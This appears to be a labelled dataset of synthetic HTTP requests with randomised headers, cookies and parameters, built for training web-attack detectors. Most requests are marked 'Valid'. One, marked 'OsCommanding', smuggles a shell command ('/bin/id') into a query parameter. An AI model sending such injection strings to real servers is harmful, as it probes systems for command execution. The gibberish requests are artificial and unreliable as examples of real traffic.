GET /IsIgsrenu/uCXOjvVTj/CuF.msf?x0aKn3G1Roa@=5ieni%25uhx%24r1qioaeac%3Br&iwiwHimdMeeseu8=u7Mb_00gwx HTTP/1.0
Host: 241.97.38.71
Connection: keep-alive
Accept: audio/*, audio/basic;q=0.9
Accept-Charset: x-mac-japanese;q=0.8, x-mac-chinesesimp;q=0.9
Accept-Encoding: identity;q=0.7
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 232.72.29.153
Cookie: md=653263
Cookie2: $Version="390"
Date: Sat, 15 Apr 06 11:25:53 UTC
ETag: "M8E9jA9nfA7H4st9Hp"
Expect: awrrh3m
From: bSdc@weygI.it
If-Modified-Since: Tue, 14 Jul 09 10:12:41 CET
If-Unmodified-Since: Fri, 09 Dec 05 01:18:00 GMT
If-Match: *
If-None-Match: "GYwpdr8JguEn8Ii"
If-Range: *
Max-Forwards: 8220
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest username="lseoiae3"
Authorization: 1heoig onarI=eduela
Range: 365749-,607-065
Referer: http://www.tucnow.st/s2hxjh/lptol.cfm
TE: gzip;q=0.5,gzip
Trailer: Trailer
User-Agent: Mozilla/7.7 (compatible; MSIE 2.7; WinNT; ydybS)
UA-CPU: x86
UA-Disp: 7522,1953,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4940x047
Via: 4.6 243.64.7.193
Transfer-Encoding: identity
Upgrade: tce/3.4, upn/8.0, iyeTt/3.0
Warning: 233 60.38.176.3 "MeOt13ias" "Mon, 16 Jan 06 05:38:03 UTC"
X-Forwarded-For: 215.190.87.154
X-Serial-Number: 331968303499551
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20205
Start - Id: 26648
class: Valid
GET /omRGyBXH4DfTPA/ondnernsn/KnpiNSlRin.swf?8U2=srdeleteo&EgteeoETLs=ri5eaoa+swiee&wotalrhet=xUgEt8mdt%40&tndi=iiF&Cscriptm7=hstsvhnhltaihb&aNestyoyTv7s=jnew&8QocHN4hX=vjp3sG&NF4az=255&neu=i&oeZUFTE6=%3Bai&5PNi=16857238&0aBz4ssmailift=difkh HTTP/1.1
Host: www.meehaes.st
Connection: keep-alive
Accept: application/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 5-der;q=0.2, do7e-sgLR, vse8a-2Ttysh, ctlAe-roT9te;q=0.6
Cache-Control: re357siw='te'
Client-ip: 147.232.3.64
Cookie: dtrjHbiea9e=8341164406;cAuo=oei;tq=taiyi2rnhtiuore
Cookie2: $Version="529"
Date: Sun, 04 Apr 04 09:42:21 UTC
ETag: "L4aJnRVFfw0cHS9"
Expect: 100-continue
From: ewdn@Isnohat.net
If-Modified-Since: Fri, 22 Oct 04 21:28:36 GMT
If-Unmodified-Since: Thu, 30 Sep 04 05:43:33 UTC
If-Match: *
If-None-Match: "2beWEYbelAVhR35w"
If-Range: *
Max-Forwards: 8216
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM bmVlcm44cm5zMGZlb3NrdG91d3NMbmloMGs2ZWFURXB0NGFldENpYzY=
Authorization: pste Tro1e=rjctt
Range: 0-8818,879-
Referer: /sEwlntG/lbrlk0li/chwIq3/nhryger/ss8ti73i.bin
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: 4t1eeeil
UA-CPU: PowerPC
UA-Disp: 080,9861,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 190x433
Via: 5.7 www.eesosn.tiff
Transfer-Encoding: identity
Upgrade: dss/7.0, hee/2.6, eu9/8.4, uieiTe/9.3, ynTjo4/4.2
Warning: 971 www.nebeab.htm:1154 "Smtbrled4Tllis" 
X-Forwarded-For: 232.156.39.113
X-Serial-Number: 21651458708939157204
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26648
Start - Id: 26025
class: Valid
GET /zK2fV4xAYRQcQMTq.3Pn/-SjploptMg/HO2NNMOI/Fq/Rx9/ijt85dW3Da/1VT8REtWDT8/ch/seo/nne/ne4w/nntLYA.shtml? HTTP/1.0
Host: 191.20.85.127
Connection: ksosa
Accept: */*;q=0.8
Accept-Charset: euc-cn, iso-8859-4, euc-tw;q=0.1, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: e7qsmi-hetcgI;q=0.0, aheg-Crg, s2pne6ei-jecin
Cache-Control: no-transform
Client-ip: 157.41.225.239
Cookie: reeaouleC1o=733
Cookie2: $Version="7"
Date: Tue, 15 May 07 22:46:49 GMT
ETag: "7wUBl2V0wMQ5Eg3Es"
Expect: 100-continue
From: ro5i@1eRlcu.be
If-Modified-Since: Sun, 01 Oct 06 04:05:21 UTC
If-Unmodified-Since: Mon, 18 Jun 07 17:07:31 GMT
If-Match: "h4mZTw803c3yNdGe76xu"
If-None-Match: *
If-Range: "@nC6B7KNQ8nDUkaxP"
Max-Forwards: 37
MIME-Version: 7.9
Pragma: eNdt='e'
Proxy-Authorization: Basic bmJPbWVvc2g6Y2VXbjVvNw==
Authorization: NTLM ZWlhdnNMaXIxbXBFYlRjaGllZWZlZXNSOGVFSmh1V293b3lrb2FjZWY=
Range: -13,874-810484,763-09710
Referer: /geeosRE/eEi7an/lbxt.pdf
TE: deflate
Trailer: Max-Forwards
User-Agent: Tohtgo (dcl@dm; ipU52C8Zo; oZpyxm; evhF6xs)
UA-CPU: x86
UA-Disp: 4002,120,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7399x6739
Via: FTP/2.9 www.thvu.jpeg, 2.7 www.umh4Tmd.tiff, 6.6 www.csntLnvo.shtml:55810
Transfer-Encoding: rAgte
Upgrade: yuk/5.7, RisS/8.9
Warning: 936 www.ab27.html "s2azr0" 
X-Forwarded-For: 212.160.180.28
X-Serial-Number: 6743288486222977
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26025
Start - Id: 10235
class: Valid
GET /VmHfa8cld_Y/P-s-adminxv7L3zGaem.asp?hhtot1j=evalih&WraH=cnetfo&Oadrseho=o0aSe5udar&ogS3i=uuTfiframe5enlcopyoebgsoundze%3Eo4&slamw=ttollrjnsiauE%5D&hmdAsehlFhi5y=mpwEBP0qQq&jT=64123&hohhlou2dhcun=icY5Nff1g&deosrrbotohea9=8&7israheDoadeWhl=eT_AlEI&esoa=obgiwth&8yBoperlOPymail6=aoMgeler0hm7pntda&js88ahoo1u=08576&0oi=tlsdonihmyccDrV HTTP/1.1
Host: www.5sTre.org:44902
Connection: keep-alive
Accept: text/*;q=0.0, video/*, text/plain;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: lss0nras-4;q=0.6, nrlteo-eMhua;q=0.2, yerar3d-esmh;q=0.7, u-ota, o2erS7an-tyhn6vdY
Cache-Control: ok='BaSe'
Client-ip: 242.45.255.170
Cookie: wt1e=840286073;nsue=Qs
Cookie2: $Version="33"
Date: Fri, 03 Mar 06 09:42:11 CET
ETag: "qgju1@024ThVVnrUmM"
Expect: 100-continue
From: 8ats@arc0sedxjc.net
If-Modified-Since: Sat, 19 Aug 06 15:48:57 CET
If-Unmodified-Since: Fri, 22 Aug 08 21:33:39 UTC
If-Match: "cm7Li36t4bJ.3XW"
If-None-Match: *
If-Range: Tue, 09 Jun 09 03:12:58 UTC
Max-Forwards: 32
MIME-Version: 2.0
Pragma: tn=lmizage
Proxy-Authorization: Digest response="09D35458eFFCF6eeB6ECbdFBEAdD11C5"
Authorization: Basic bW5Sc3RuZjpheURl
Range: 48806-,859-40,-983
Referer: http://www.PYsyw.ch/eimw/heeher.css
TE: chunked,gzip,deflate
Trailer: Transfer-Encoding
User-Agent: d37ngM-yq8 http://www.pdlt.biz
UA-CPU: PowerPC
UA-Disp: 118,0565,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 0173x2710
Via: HTTP/5.8 www.hairmino.shtml:2344, FTP/6.7 238.200.192.137
Transfer-Encoding: deflate
Upgrade: e34/2.8, srytrj/3.4, igIE5/7.9, eidtoe/3.9, xiv8g/0.2
Warning: 543 www.ocsh.htm "tc9yeg9eae" 
X-Forwarded-For: 190.210.254.122
X-Serial-Number: 56021671448691274221
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10235
Start - Id: 43111
class: OsCommanding
GET /eHSe/r5KSCJov64BI6_/2PVYqn74Ne8rj/eCUQNW-m@HIsqy/tte/DoA.Gt/aWcH7pv_1cSh5.Nb_/mot/oV3Vhtpass6OP.oFaccess_log%uaccept.php4?Ooe=%5C%3B%5C%2Fbin%5C%2Fid%3B HTTP/1.1
Host: 2.57.251.124:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: ks_c_5601-1987, euc-jp;q=0.0
Accept-Encoding: 
Accept-Language: ineepf-e33uzeso;q=0.2, ynieee-osEaah, cta-jpu;q=0.2, 3qqnsli-loBohf
Cache-Control: no-cache
Client-ip: 107.157.218.192
Cookie: itisEbtohe=iBX9fbNh@m
Cookie2: $Version="389"
Date: Sun, 12 Aug 07 13:04:00 UTC
ETag: "WV@RnoNoblIi_WrxHi"
Expect: 100-continue
From: 5aEtd@kfeetndtk6.de
If-Modified-Since: Tue, 09 Oct 07 10:02:17 CET
If-Unmodified-Since: Fri, 18 May 07 02:08:26 GMT
If-Match: "mxBP9BG8Ob6JSSZId"
If-None-Match: *
If-Range: Thu, 22 Jan 09 16:53:56 GMT
Max-Forwards: 4537
MIME-Version: 9.7
Pragma: ss='gh'
Proxy-Authorization: NTLM dHNudGs5YWFpZGVvb2hueTZxbWVocmw4VUlTaXRoZ2F1bmlyVHNIdDlSZlVwaW9l
Authorization: ebLw xtl4r=t6xue5
Referer: http://eDot.org/ohs2ge/siaua/26Nbmjpu/Zy9e4ot/lsoa.php4
TE: deflate;q=0.7
Trailer: Connection
User-Agent: hmpsjah/3.9.9.7
UA-CPU: StrongARM
UA-Disp: 046,4473,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 603x2268
Via: 5.8 www.ndqgd.css, Teg/7.3 63.251.131.119
Transfer-Encoding: gzip
Upgrade: Fgohbd/4.1
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Forwarded-For: 204.73.145.24
X-Serial-Number: 306986025864028
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43111
Start - Id: 34742
class: Valid
POST /ve0AO/stdinradmin3pG_M_s/nra/nIlRt6Qju.M9A1HwlI/xprocessing-instructionjs@nechomf/h85Ih/8WO6t_lUq7/dn@jg7v/tgnsf/qhpxfnNrb.tiff? HTTP/1.0
Content-Length: 268
Content-Language: gneis,sEo
Content-Encoding: compress
Content-Location: /artaoi/teqk/fknob.mdb
Content-MD5: bm9XYmJlbm8xa3BlaWphZA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 28 Dec 04 21:45:56 GMT
Last-Modified: Sat, 19 Jan 08 04:36:40 CET
Host: www.hbztkU.cz
Connection: close
Accept: application/x-tar;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: YtLheAox-tli;q=0.3, f-rsntssip, iDtmdan-u
Cache-Control: no-transform
Client-ip: 192.5.233.110
Cookie: enmaenltl=59;goh=dlllltxyaeouec
Cookie2: $Version="1"
Date: Thu, 05 Nov 09 18:05:22 CET
ETag: W/"A2YfQVTZXS@2CEv"
Expect: 100-continue
From: tIeiaSrs@eek7eEs.com
If-Modified-Since: Thu, 24 Apr 08 06:11:12 GMT
If-Unmodified-Since: Wed, 08 Mar 06 01:20:16 CET
If-Match: "KYBuHkk6B2bIDiXB4u1"
If-None-Match: *
If-Range: *
Max-Forwards: 5721
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest algorithm=g3ehNez
Authorization: NTLM c2ZyNTU3YWRudEdob3BlaXNoT05waEVpbnIwczFpenRzcmE1cHFobWljdFNl
Range: -55195,-08
Referer: /Lv7goir.msf
TE: gzip;q=0.8
Trailer: TE
User-Agent: Mozilla/5.0 (X11; U; Linux i386 8.6; lb-a0; rv:9.7.0) Gecko/58123536
UA-CPU: 68000
UA-Disp: 6894,585,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 420x8395
Via: HTTP/1.4 www.arnedTa.jpg, 6.3 www.anrs.jpg:40690, gwi/4.9 www.nceewIa.js
Transfer-Encoding: fpt3
Upgrade: ndnsb/1.0, efsssf/8.5, t7tuy/1.9, htoq/4.5, aeo/9.0
Warning: 636 www.T3edR.css:19 "nPNuowhpty5d" 
X-Forwarded-For: 66.86.162.41
X-Serial-Number: 8267769973
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

estin=8886408197&ohno17haphe=rBLmEHnAJ&taYoethbq=etqkmQuD3uiD&77sfe4aa=9stde4euSte&0A0aUx=8ner1iA<wo0d D&0Ae0Rp=331117&adersOt0v=hPbxOj&02ebni1asUi=u 7p8tetann]&gs1mnpAlqgK=includehRb&rndaota3iitauie=u2rurltbhl5w r&sihsv7=qh atd>oee %;3timgallalc&E8r2dwsq=79

End - Id: 34742
Start - Id: 23012
class: Valid
GET /jorrowt/xH7r7UMCIP9oc.gMe_.jpeg?snlsTnhns4nhlf=rftrnerygca56e&aesb=pEeO%40itanm%2Fnde%5C%7C&u9Fes9idw6=den1tddCTee&aoeedi=33745&trosa8louDdg=ttsdhuiEI4nny&plpscemO=haermc4bodyape&oCc4fegoltt=25963&eeoatelnetg=h6a%3Eihia%5Cxal&bdReqonropore=102&cqH=elmrfdctelnethm%3EuveEtitrt&rolhjgusBMS=wutr&w1otH9ic5=-iZapIW8esR&iat2neoi=230281952 HTTP/1.1
Host: www.ituiqitnla.gov:11
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: gzip, identity, gzip, gzip;q=0.3, compress
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 83.68.194.74
Cookie: te4cchvobtbagut=Cees;rsdtH=kaoF6fZO;reeSnqrbdhr=0aolboot.ininXlmadusbgza
Cookie2: $Version="29"
Date: Sat, 11 Jun 05 23:11:19 UTC
ETag: "DH4D@c.p46C-WPHgl"
Expect: oulrn=eeb8UweR
From: reCec@atistonN.com
If-Modified-Since: Mon, 09 Jan 06 08:31:56 GMT
If-Unmodified-Since: Fri, 14 Jan 05 06:22:11 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 24 Jul 05 04:53:28 UTC
Max-Forwards: 102
MIME-Version: 9.3
Pragma: gsivhtlc='lt3'
Proxy-Authorization: Basic bEVFYUx0THQ6ZWVobGVyOA==
Authorization: Digest uri=http://www.4s2dpdh.it/r2o4/XEhnbM/HHnnBne/hoebuc/w8ogkAan.jsp
Range: -04,115705-698
Referer: /4e8nr/niyo/ssuexo/ubbnj.asmx
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/6.7 (Windows; U; WinNT 3.8; oy-mz; rv:1.7.8) Gecko/99493197
UA-CPU: MIPS
UA-Disp: 8779,521,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 465x0327
Via: e5an/6.9 222.200.211.120:3031, HTTP/9.3 www.orgua.jpeg:17
Transfer-Encoding: compress
Upgrade: 9p2tdD/2.8, aeolon/3.0, ieaa/7.4, clo/8.1
Warning: 590 www.opmscngj.html "lswlRodnknfotDgav" "Wed, 07 Apr 10 19:07:32 GMT"
X-Forwarded-For: 242.37.131.17
X-Serial-Number: 782598520003
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23012
Start - Id: 13461
class: Valid
GET /Elnl5inhwkBauthi8u/hnHnsao5za/szFel3-./aoZ8r2XF3/mogcmhttsteyb/O6VkWaAYDW/0PM4BXf-m/meNqsnjAFie/mrbm2eeB3oesoaBToese.sh? HTTP/1.1
Host: 193.89.111.238:80
Connection: keep-alive
Accept: audio/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: om3zm-ch;q=0.2, gRtlsa-Tba;q=0.9, many-6aEaite0
Cache-Control: max-age=3722
Client-ip: 222.11.112.162
Cookie: Ka=tcN;panijrg=l ;Itz=aspvdr;9
Cookie2: $Version="7"
Date: Tue, 27 Apr 04 07:12:42 CET
ETag: W/"9cClyJiotc2LukdJQ6R"
Expect: jo5am=rShvn;aptesIgs=saftiid
From: ahyni5@nu8Ltehais.it
If-Modified-Since: Sat, 12 Mar 05 21:40:03 CET
If-Unmodified-Since: Wed, 17 Jun 09 22:17:35 GMT
If-Match: "xES7iJWyUBSpeBH"
If-None-Match: *
If-Range: Sun, 04 Oct 09 14:30:32 UTC
Max-Forwards: 27
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM c29lb25mYXNyc25sc29uZUJkb2F4b2FlczBqRWxOck50cHJsaQ==
Authorization: NTLM MWRhaW9ybmhvaXRtZWFuc2x0ZWVlaXJIb25sb1Vyc3Q=
Range: -20257
Referer: http://ttrle0s.com/sxqnMoet/gXnTiY/b9Ua3.cfm
TE: trailers,gzip;q=0.4
Trailer: Accept-Encoding
User-Agent: Mozilla/8.6 (Windows; U; Win98 4.7; gd-ea; rv:8.9.1) Gecko/14445058
UA-CPU: x86
UA-Disp: 710,2643,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 188x166
Via: 5.7 www.ef3ahD.png
Transfer-Encoding: gzip
Upgrade: bO6/2.7, oawf6h/2.0
Warning: 403 www.ameiXrAq.jpg:50 "inohizhcts2llsj" "Mon, 19 Jun 06 02:09:24 GMT"
X-Forwarded-For: 37.38.29.200
X-Serial-Number: 564796261351412431
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13461
Start - Id: 28720
class: Valid
GET /k-Zy.p.msf?tfh4Ee4swoAd=ra5de0netjngc&EsLeCgrcThlh=e4-%5DTt&amnaiee=n5_E&4eomD=eFt&oentoamo=sQ2jiiifc2esik&bn=m9dnadnth9wh&77yn=fl2&HHujfGRx40=306388 HTTP/1.1
Host: www.rrodjnn.de
Connection: close
Accept: image/gif;q=0.4, image/jpeg;q=0.3
Accept-Charset: iso-8859-3
Accept-Encoding: *;q=0.9
Accept-Language: 39eips-seilI4Ou, tximh-seafrAo;q=0.0, rei-vq8nr;q=0.2, reeo-iir0a;q=0.0
Cache-Control: max-age=8162
Client-ip: 108.135.145.93
Cookie: tahom5n=sq8ch=0atW:
Cookie2: $Version="7"
Date: Thu, 11 Oct 07 03:02:44 CET
ETag: W/"ZTtXFp@@SCj_TFuFaKN"
Expect: wiha=9ueo5w;uns1sl
From: cmNaehb@twerq2.gov
If-Modified-Since: Wed, 30 Aug 06 09:39:01 CET
If-Unmodified-Since: Fri, 18 Apr 08 13:38:55 UTC
If-Match: "DwjsTsIBAxTH.wn1Zm4X"
If-None-Match: *
If-Range: "HGQ5XiWljH5.YQDoagZ"
Max-Forwards: 29
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: siuc bqgrlp=tt1h
Range: -5
Referer: /se5SineR/QNhoidn/eINecch/iymi.tar
TE: chunked,gzip,chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: 2aaseeo9o55Q7w2b
UA-CPU: PowerPC
UA-Disp: 9543,263,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 621x541
Via: 6.5 www.kq5e.css, HTTP/6.3 140.45.125.121:30968
Transfer-Encoding: d4nit
Upgrade: fsum1e/6.1, i6ee/7.9, ijopmA/5.0, jtoin/2.2
Warning: 836 132.240.161.224 "hraln" 
X-Forwarded-For: 41.255.95.49
X-Serial-Number: 840252996378195680
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28720
Start - Id: 27228
class: Valid
GET /iCKZAqd_p3-WdN9QFUp/SOopenWCK8KincludewgetVB.jpg? HTTP/1.1
Host: www.dsokhluo.de
Connection: close
Accept: */*
Accept-Charset: gb2312
Accept-Encoding: *;q=0.4
Accept-Language: rnwqsS7-bgoaar;q=0.7, htw-eanp;q=0.8, be-mehwoa, nd-xbc, oteu-j;q=0.3
Cache-Control: max-stale=1
Client-ip: 118.249.27.115
Cookie: osei6Nouozw=008981131;xalertnde=569;qinsertnodecopykR=a;U1wVdocumentVOHsUg=noj;isiad5L=dseoor5
Cookie2: $Version="0"
Date: Fri, 21 Jul 06 23:24:30 UTC
ETag: W/"uuyM-6FilYWqa@Bq"
Expect: 100-continue
From: swk0qTsy@7ydemyi.com
If-Modified-Since: Tue, 10 Apr 07 04:37:20 CET
If-Unmodified-Since: Tue, 16 May 06 13:08:20 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 16 Feb 08 13:54:36 GMT
Max-Forwards: 862
MIME-Version: 6.9
Pragma: 0=tsh
Proxy-Authorization: Digest realm
Authorization: NTLM aGVIbjBzczRld29qNVRzZGVpZW1lc1NuN3VhaGdrZWk=
Range: -916,-3,-01
Referer: http://3fydE.be/umna/ppdtc.bin
TE: trailers,trailers,gzip
Trailer: If-Match
User-Agent: Mozilla/6.6 (X11; U; Open BSD i386 6.4; mo-re; rv:6.6.2) Gecko/77786129
UA-CPU: 68000
UA-Disp: 4043,642,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0571x6226
Via: HTTP/8.9 245.140.174.186, HTTP/7.5 www.oneEhll.htm:0, HTTP/0.3 www.hnes7d0.png
Transfer-Encoding: deflate
Upgrade: nnr3no/2.4, ssa6/6.6, nrmmhe/0.5, dTflr/9.1
Warning: 294 125.68.204.148 "qsD6esueacnn6pawXhhU" 
X-Forwarded-For: 59.58.186.111
X-Serial-Number: 907247306873
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27228
Start - Id: 25258
class: Valid
GET /afY_sj3DFAIL/GWwBhZOHSYM/ypT0/i1UXKUzBlRS_OAHTD/Qws9GF@bLw/q4/er/ivGgz0sGrZVQ.Anac-uP/EfdmiK85esefje8.cfm? HTTP/1.1
Host: www.htame8rae.com
Connection: irirudes
Accept: */*
Accept-Charset: x-mac-ce, iso-8859-8-i, iso-8859-4, cp-950;q=0.7, shift_jis
Accept-Encoding: 
Accept-Language: ozrse9ee-atbbeiau;q=0.5, ioneFo0-hjki
Cache-Control: max-stale=3450
Client-ip: 216.47.86.82
Cookie: lllr=~Ete3rbhometizot;886lLtaerninoE=tay.CaFRg;hr2tc3tcNnrenn=254489;tegzehx=886;oM6uiJoost=3966
Cookie2: $Version="516"
Date: Sun, 17 Apr 05 19:39:54 CET
ETag: W/"N2iDHylI3fL6Z6O8rNa"
Expect: lIlpg7la=Sguet
From: e8ue@ouofs.gov
If-Modified-Since: Sun, 03 Jul 05 16:09:29 CET
If-Unmodified-Since: Thu, 02 Mar 06 07:24:14 GMT
If-Match: "_8@4Eg36ZEsXTrC_v8mk"
If-None-Match: "lnNug96jF6gEhcRK7Y"
If-Range: Thu, 16 Feb 06 05:21:46 GMT
Max-Forwards: 711
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: 7ddr oinerrtu=Stpan
Authorization: Basic cllpZW46enRrZWE=
Range: 7-54,1-07056,-1403
Referer: /yoajl/hammbeb/smnnu/LRrcirne/wiran.msf
TE: chunked,deflate;q=0.3
Trailer: Trailer
User-Agent: Mozilla/6.7 (Machintosh; U; Mac OS X 7.7; vt-or; rv:9.3.1) Gecko/20093506
UA-CPU: PowerPC
UA-Disp: 8204,1865,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4028x8502
Via: 7.8 www.kepaedb.htm, 3.0 www.drva4fae.css, 1.9 170.72.64.108
Transfer-Encoding: identity
Upgrade: 1oew6/6.7, 13a/4.7, aismae/7.4
Warning: 741 4.215.113.72 "rtadv" "Sun, 22 Aug 04 14:34:46 UTC"
X-Forwarded-For: 122.55.3.217
X-Serial-Number: 139373036597408522
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25258
Start - Id: 12254
class: Valid
GET /u8ZN6rKizHLc/Qinsert2/tLCgsi8VhRHJyGSk1/iw_jKNlMEb7iP65Fc/elyaSuhnfca/tV/hK@y_isHnktq5-gwSbgR.jsp?msetmng=885&merpl=nGz&1@3le_AAl=szs&fT0eSfthev7imm=99tBwl-zXB&plhmtetekk=nMvw0%25um&IbOpcdU=9174121&leetane9iw=enn2%295nt+e+iejt&lldsd49dAqmE5bi=48925163&batw=eJS3lqns&ZZR.GimgDbt=viis+6cmnAthptaftp1h&af_erc26RJK=4197&n7Yo=3852332090&ntt=oWE%2F&o.VYqQ-pY9=%3Dlivt&2te=kawaiformjrqhsK4rx HTTP/1.0
Host: 160.237.130.47
Connection: beodt
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.5, identity;q=0.7, compress, gzip;q=0.1, compress;q=0.0
Accept-Language: *
Cache-Control: max-stale=73023
Client-ip: 177.239.33.200
Cookie: crernunEaeh=1oroo;ereagsstidlc=iM-_794;FgRQJog=45346785;sd4E=eUP9Q;Eeqr=v9D;2la=x8vorilikeweir
Cookie2: $Version="852"
Date: Sun, 05 Aug 07 11:30:17 GMT
ETag: W/"dun6OJp0T_eul4E"
Expect: tamerp2K=5twie4
From: tRmfo@Moomaa.cz
If-Modified-Since: Thu, 21 May 09 11:35:29 CET
If-Unmodified-Since: Mon, 06 Feb 06 03:51:51 GMT
If-Match: "ryrsy0VxIaVQ375KMP8"
If-None-Match: *
If-Range: Mon, 16 Nov 09 02:43:36 CET
Max-Forwards: 5
MIME-Version: 1.6
Pragma: nobasd=lea5af
Proxy-Authorization: NTLM ZG50dHJ2ZGhhaWF1ZWFiZG5Jd3Bhc2VPb1R3aGNub2VuYXNvRWlkbHJ3Y3NucA==
Authorization: zn5f8a zedOwr=fet0te
Range: 59-,042414-38,-0351
Referer: /aicn8te.tiff
TE: gzip;q=0.9
Trailer: Expect
User-Agent: 3A7q@vuC6J http://www.i6oz.it
UA-CPU: Sparc
UA-Disp: 689,5553,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7901x792
Via: 7.9 www.etde.shtml:10
Transfer-Encoding: compress
Upgrade: are/3.5, nrPtg/9.5, rewld/9.8, asadg/3.5, doH/5.9
Warning: 801 56.160.18.152 "x1hi" "Mon, 01 Dec 08 03:48:59 UTC"
X-Forwarded-For: 93.31.136.215
X-Serial-Number: 8899123917889
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12254
Start - Id: 7037
class: Valid
POST /oiframe9ddfriframeI5.UvU/stauooa4s/rreCplc.cgi? HTTP/1.0
Content-Length: 85
Content-Language: na7Rplo,c,ee
Content-Encoding: deflate
Content-Location: http://ft1d1uEg.uk/6eot/oihns9is/sje7Nni.conf
Content-MD5: VDVua2F0bmFzdGFmY3Nscw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 Mar 05 22:35:42 UTC
Last-Modified: Sat, 29 Nov 08 12:40:45 UTC
Host: 202.38.0.20
Connection: close
Accept: application/*
Accept-Charset: cp-950, iso-8859-1, x-mac-ce
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=618
Client-ip: 42.139.126.253
Cookie: pgn21bs1si=o7kNZfQKa
Cookie2: $Version="137"
Date: Tue, 26 Aug 08 19:35:05 CET
ETag: "5mD4pIqzxc3lOyc"
Expect: 100-continue
From: yfats@jmaNa.biz
If-Modified-Since: Mon, 03 Oct 05 12:34:24 GMT
If-Unmodified-Since: Thu, 15 Jul 04 12:44:28 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 17 Jan 07 05:53:38 CET
Max-Forwards: 0
MIME-Version: 9.4
Pragma: sc='spnaAt0'
Proxy-Authorization: cls18 ensvsjo=ofs8etd
Authorization: Basic dHRuYm46YUxlTmNz
Range: -251792
Referer: /tsair/nryo.html
TE: chunked;q=0.5,chunked;q=0.7
Trailer: Accept-Charset
User-Agent: Mozilla/6.0 (compatible; Konqueror/3.0; Linux i386; yossnSuT5a; eor5ns; m7aVlrtv)
UA-CPU: x86
UA-Disp: 1173,628,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 8498x1908
Via: 3.9 www.raugr.png, FTP/0.2 226.122.10.93, 3.8 164.8.123.137
Transfer-Encoding: compress
Upgrade: nepoz/8.4, wie/3.9, lnenne/2.6
Warning: 036 www.itrr13.png "nibefaudetRu5ldaaj" 
X-Forwarded-For: 213.145.136.133
X-Serial-Number: 484018235309
----: ----------------
~~~~~: ~~~~~~~~~~

yohueehmToeio=5&0snAuU=VNaasnelt7hz6siitt&osn=16237588&scriptOqnph-8.Phttps=:ehOlii

End - Id: 7037
Start - Id: 1770
class: Valid
GET /IMh7rcpGyY8z3Fgroup by@A/p221bsZ5ztx/v5connectFrRC.php3?metaOpfgC=Grnt&8tsd5i3hets=06387178&ehniemtjh1Rnxso=100&radf93nIhe=ji+%3C&jibipY4ey4tl8o=dix4anradpmms&ooep9usto=%5DA2&6oronn=dTL4iAvan&mfbi=7sa&mHFybDvPwherelTn=+ndivfoOmallpxt+%3BtI&5hshatc=2rsc%25rAasa+gi&sdrrtr=tzkdmiasam%28tme9&rlynsgith9=5ND.V6%40r&-oexterml.=aaelisnehH&tedbzr23D=2437&8airoese9Laemy=tC%40Cb HTTP/1.0
Host: 18.255.90.228
Connection: lumLnt
Accept: video/mpeg;q=0.4, image/gif;q=0.6, audio/basic;q=0.5
Accept-Charset: *;q=0.5
